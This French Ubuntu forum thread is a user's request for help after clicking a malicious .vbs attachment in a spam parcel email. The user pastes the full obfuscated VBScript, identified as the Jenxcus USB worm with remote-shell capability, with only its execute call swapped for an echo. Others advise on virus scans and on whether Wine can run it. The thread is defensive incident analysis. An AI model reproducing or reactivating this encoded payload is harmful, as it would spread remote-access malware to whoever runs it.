Pages : 1
#1 Le 24/03/2020, à 16:06
- Nuliel
[Résolu] script malicieux VBscript
Bonjour,
Je viens de faire une grosse bêtise, j'ai ouvert un mail pour un colis en pensant que c'était pour mon colis qui devait arriver et en fait c'était un spam. Et j'ai sans faire exprès tenté d'exécuter un fichier vbs dont voici le contenu (aux amateurs de reverse):
dim tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy
tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy = "ܖܲݞݓݔݓݑݨݥݎܱܟܠۼ۹ܾݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ۼ۹ݙܬݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖܬݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲݥݦܟݡݜܑܛܑ݂ݞݕݣݦݐݡݔܼݘݒݡݞݢݞݕݣ݆ݘݝݓݞݦݢܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݁ݤݝܑܛܑܷܻܼ݂ܾ݆ܴܺܵ݃ܰ݁ܲݛݐݢݢݔݢܑܛܑܴ݁ܶݎܑ݂݉ܛܑݓݔݕݐݤݛݣݘݒݞݝܑܘۼ۹ݨܬݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝݖݞܗݜܘۼ۹ݘݕݜܬܣݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܕܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕݖݞܬܑܑݣݗݔݝݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݘݕݜܬܠݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕݜܬܡݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓݘݕۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݢݔݣݦܬ݆݂ݒݡݘݟݣۼ۹ݢݔݣݢݗܬܲݡܗܟܘۼ۹ݢݔݣݕݢܬܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝܲݡܗܽܘۼ۹݂ݔݣܲݡܬܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܴݧܗݢܘۼ۹ܴݧܬݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽܕܑݎܑܕݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑܽݢۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝܑݢݒݗݣݐݢݚݢܞݒݡݔݐݣݔܞݢݒݜݘݝݤݣݔܞݜݞܠܞݣݝ݂ݚݨݟݔܞݣݡܑܕܲݗݡ݆ܗܢܣܘܕݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܟܘܕݖܗܢܘܕܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛܲݗܕݓݡܕܲݗܛݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗܕܲܕݦݝܛݣݡݤݔۼ۹ݔݝݓ݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ۼ۹ݢݤݑݢݟݡۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݕݞݡݔݐݒݗݓݡݘݝݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗܕݒۼ۹ݘݕݓݡܝݘݢݡݔݐݓݨܬݣݡݤݔݣݗݔݝۼ۹ݘݕݓݡܝݓݡݘݥݔݣݨݟݔܬܠݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛݓݟܕݦݝܛݣݡݤݔۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟܕݦݝܘݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟܕݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓݘݕۼ۹ݕݞݡݔݐݒݗݕݘݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘݣݗݔݝۼ۹ݘݕݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘܫܭܑݛݝݚܑݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕݤݒݐݢݔܗݕݘܝݝݐݜݔܘܫܭݤݒݐݢݔܗݦݝܘݣݗݔݝۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕܑܝܑܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܕݒܘܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡݔݐݒݗݕݞݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݕݞܝݝݐݜݔܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣݔݧݟݛݞݡݔݡܑܕݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺݢݞݕݣݦݐݡݔݒݛݐݢݢݔݢݕݞݛݓݔݡܑܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗܬݒݗݡݦܗܢܣܘۼ۹ݒܬݒݗݡݦܗܨܡܘۼ۹ݕݤܬݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘܕܑܼݘݒݡݞݢݞݕݣܝܴܽ݃ܵݡݐݜݔݦݞݡݚݥܡܝܟܝܤܟܦܡܦݥݑݒܝݔݧݔܑܘݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓݘݕۼ۹ۼ۹݄ܬݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ݄ܬܑܑݣݗݔݝۼ۹ݘݕݜݘݓܗݕݤܛܡܘܬܑܩܑܕݦݝݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣݒݐݢݔݢܗܟܘۼ۹ݒݐݢݔܑݔݧݒܑۼ۹ݢݐܬݢܗܠܘۼ۹ݔݧݔݒݤݣݔݢݐۼ۹ݒݐݢݔܑ݂ݒܑۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡܛܥۼ۹ݒݐݢݔܑܑ݁ܵۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡۼ۹ݒݐݢݔܑ݁ݔݝܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕܬݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕܬݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔܑ݄ݟܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘܬݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝܑݦݢݒݡݘݟݣܝݔݧݔܞܞܑܱܕݒݗܕݕݤܕݒݗܛܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔܑܲݛܑۼ۹݆ܝݠݤݘݣۼ۹ݒݐݢݔܑ݄ݝܑۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ"
QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = ""
Dim wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk
wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = 0
dim mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF
mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = 0
dim CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl
dim qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu
CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl = "HGFTYtdcyfsaty!@#FFDS"
qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = 0
do until mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl)
mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF + 1
qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + AscW(mid(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl,mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF,1))
loop
do until wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = Len(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy)
wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk= wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk + 1
QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf & ChrW(AscW(Mid(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy, wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk, 1)) - qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl))
loop
Wscript.Echo QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf
Ai je fait une grosse bêtise ou une bêtise ou en fait ça n'a rien fait?
PS: c'est sur mon pc fixe donc wine est installé
PS2 (comme la console): j'ai remplacé execute par Wscript.Echo pour des raisons évidentes
Dernière modification par Nuliel (Le 25/03/2020, à 21:57)
Hors ligne
#2 Le 24/03/2020, à 17:09
- Nuliel
Re : [Résolu] script malicieux VBscript
Quelques infos supplémentaires:
- virustotal m'annonce que son petit nom est jenxcus
- il infecte les clés usb (super, j'avais ma clé usb de cours branchée)
- il permet à l'attaquant d'avoir un shell distant
Voilà. Je vais passer clamav sur ma clé usb déjà
Hors ligne
#3 Le 24/03/2020, à 17:56
- Nuliel
Re : [Résolu] script malicieux VBscript
Bon, je viens de tester un truc: essayer de lancer un hello world avec wine.
Résultat: ça marche pas (ou je m'y prends mal)
Hors ligne
#4 Le 24/03/2020, à 18:42
- tuxmarc
Re : [Résolu] script malicieux VBscript
Bonjour Naziel
On en apprend tous les jours.
Je n'avais aucune idée de ce qu'était un fichier VBS, Wikipedia a rempli le vide :
VBScript (diminutif de Microsoft Visual Basic Scripting Edition, créé par Microsoft) est un sous-ensemble de Visual Basic utilisé en tant que langage de script d'usage général. Il est souvent comparé au JScript.
Virus informatiques et VBScript
Permettant de réaliser pratiquement n'importe quelle opération sous un système Windows en utilisant la technologie ActiveX et Killbit, le VBscript a été utilisé pour la création de nombreux virus informatiques.
De nombreux virus écrits en VBscript apparaissent en l'an 2000. L'un des plus connus est le virus « VBS.LoveLetter » aussi connu sous le nom de « I love you ».
A ce que j'ai compris, c'est grâce à une création de M$ que les hackers se sont bien amusés !!
Je suis incapable de dire si le bazar aurait pu se glisser dans les fichiers de Wine et faire des bêtises, mais j'en doute.
A une époque je me suis amusé à cliquer volontairement sur des trucs foireux qui pouvaient semer le souk sur un système W$, et sur mon système, jamais rien eu
En plus de clamav, un coup de rkhunter ça serait rassurant.
Vive Richard Stalmann, Linus Torvalds, et tous les fondus de Linux.
De l'Ordinosaure fait à 90% de récup, à deux portables LDLC, neufs sans système et une carte mère sans boitier, tous libres !!
Parrain Linux sur www.parrain-linux.com et www.parrains.linux.free.fr
Hors ligne
#5 Le 24/03/2020, à 18:49
- Nuliel
Re : [Résolu] script malicieux VBscript
J'ai demandé en même temps sur irc (canal de rootme) et on m'a dit qu'il y a des chances que cela n'ait absolument rien fait.
J'ai trouvé une méthode pour désobfusquer le code précédent (remplacer execute par MsgBox oo WScript), dès que j'arrive à avoir accès à ma clé usb sous virtualbox je teste ça.
J'arrive pas à faire fonctionner clamav, freshclam ne fonctionne pas
Dernière modification par Nuliel (Le 24/03/2020, à 18:50)
Hors ligne
#6 Le 24/03/2020, à 18:54
- tuxmarc
Re : [Résolu] script malicieux VBscript
J'arrive pas à faire fonctionner clamav, freshclam ne fonctionne pas
Réinstallation complète.
Cela dit, je l'ai d'installé sur des distris, je ne m'en sers guère, je vois qu'il est là quand la bécane n'avance guère et que top cafte qu'il bouffe plein de place.
Vive Richard Stalmann, Linus Torvalds, et tous les fondus de Linux.
De l'Ordinosaure fait à 90% de récup, à deux portables LDLC, neufs sans système et une carte mère sans boitier, tous libres !!
Parrain Linux sur www.parrain-linux.com et www.parrains.linux.free.fr
Hors ligne
#7 Le 24/03/2020, à 18:55
- rogn...
Re : [Résolu] script malicieux VBscript
Quelle était l'extension du fichier ?
#8 Le 24/03/2020, à 18:56
- Nuliel
Re : [Résolu] script malicieux VBscript
L'extension est vbs
Hors ligne
#9 Le 24/03/2020, à 19:00
- rogn...
Re : [Résolu] script malicieux VBscript
Et pourquoi tu dis "'j'ai sans faire exprès tenté d'exécuter un fichier vbs" ? Tu as une action spécifique lors d'un double-clic sur ce type de fichier ?
Dernière modification par rogn... (Le 24/03/2020, à 19:01)
#10 Le 24/03/2020, à 19:00
- Nuliel
Re : [Résolu] script malicieux VBscript
Bah parce que j'avais pas vu l'extension et que j'ai cliqué dessus
Hors ligne
#11 Le 24/03/2020, à 19:07
- rogn...
Re : [Résolu] script malicieux VBscript
Tu étais sur Thunderbird ?
#12 Le 24/03/2020, à 19:10
- Nuliel
Re : [Résolu] script malicieux VBscript
Oui, l'extension était bien visible mais j'ai cliqué trop vite en fait, surtout que ça parlait de colis et que j'attends justement un colis (plus précisément le colis a mis un mois pour arriver et il en manque un morceau, donc la deuxième partie arrive, dans plus d'un mois sûrement...)
Et je viens de tester en machine virtuelle, le script ne se lance même pas avec wine.
Dernière modification par Nuliel (Le 24/03/2020, à 19:13)
Hors ligne
#13 Le 24/03/2020, à 19:13
- Pending...
Re : [Résolu] script malicieux VBscript
Tu as lancé ça depuis une installation Linux ? Si c'est le cas, je ne vois pas en quoi il aurait pu t'infecter, même avec Wine d'installé.
Ubuntu / Mint / Windows 10
Hors ligne
#14 Le 24/03/2020, à 19:15
- Nuliel
Re : [Résolu] script malicieux VBscript
Oui, depuis ubuntu 18.04.1 à jour.
En fait, je me demandais si wine pouvait exécuter des fichiers vbs et potentiellement faire des bêtises dans mes fichiers, mais visiblement il sait pas faire.
Hors ligne
#15 Le 24/03/2020, à 19:33
- Nuliel
Re : [Résolu] script malicieux VBscript
Bon, je viens de desobfusquer le code du dessus, effectivement ça parle windows de A à Z.
Hors ligne
#16 Le 24/03/2020, à 20:46
- rogn...
Re : [Résolu] script malicieux VBscript
Il ne saura pas faire car il n'y a pas de moteur VB sur ton PC, à moins que tu en aies installé un.
#17 Le 24/03/2020, à 21:40
- Nuliel
Re : [Résolu] script malicieux VBscript
Je n'ai pas installé volontairement de moteur VB mais peut être que lutris en a installé un pour l'un de mes jeux.
Au final j'ai réussi à lancer le malware modifié avec winetricks, ce qui m'a permis d'obtenir le code source.
Dernière modification par Nuliel (Le 24/03/2020, à 21:41)
Hors ligne
#18 Le 25/03/2020, à 21:55
- Nuliel
Re : [Résolu] script malicieux VBscript
Alors la fin de l'histoire: j'ai trouvé un fichier desktop qui indique comment lancer un script vbs, et dans ce fichier le wineprefix de far cry 3 est indiqué (le jeu que j'essaie de faire fonctionner sur linux, mais bon vu la qualité du truc je pense que c'est une perte de temps)
-> wineprefix de far cry 3 à la poubelle (c'est pas une grosse perte)
Conclusion: oui, un fichier vbs peut être lancée avec wine, mais il faut le lancer comme ça
wine wscript fichier.vbs
(sans wscript il s'attend à trouver un exe)
Merci à tous, je passe en résolu.
Hors ligne
Pages : 1